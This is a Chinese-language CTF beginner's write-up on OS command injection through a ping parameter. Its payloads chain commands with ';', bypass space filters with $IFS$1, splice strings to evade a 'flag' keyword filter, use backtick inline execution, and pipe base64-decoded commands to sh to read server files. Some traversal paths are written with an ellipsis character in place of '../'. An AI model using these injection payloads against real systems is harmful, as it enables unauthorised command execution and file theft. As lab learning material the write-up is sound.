CTF入门笔记之ping

1.用命令行找flag文件

随便ping,然后跟ls

例如：1;ls

发现index.php文件
1；cat index.php 查看发现就是源网站。
那就向上找
1;ls …/

继续向上找
直到1;ls …/…/…/

发现flag 打开
1;cat …/…/…/flag

得到flag

2.绕过过滤打开文件

同样,先查看目录

payload:?ip=1;ls

发现两个文件，尝试直接打开index文件（虽然知道肯定不行）

payload：?ip=1;cat index.php

果然不行

猜可能过滤了空格（space）,绕过空格过滤有很多方法，
%20、%09、$IFS$1、${IFS}、<>、<还可以用{} 比如 {cat,flag}，这里发现$IFS$1可以使用。

payload：?ip=1;cat$IFS$1index.php

发现一堆过滤,其中还包括flag

接下来就是绕过flag过滤就行了

方法一：拼接flag

payload:?ip=1;a=ag.php;b=fl;cat$IFS$1$b$a

在网站源码中可以看到flag

方法二：内联执行绕过（即``）

payload:?ip=1;cat$IFS$1`ls`

使用内联执行会将 ``内的输出作为前面命令的输入。

同样在源码中可以看到flag

方法三：base64编码绕过

payload:?ip=1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
Y2F0IGZsYWcucGhw即cat flag.php的base64编码

同上。在源码中找到flag。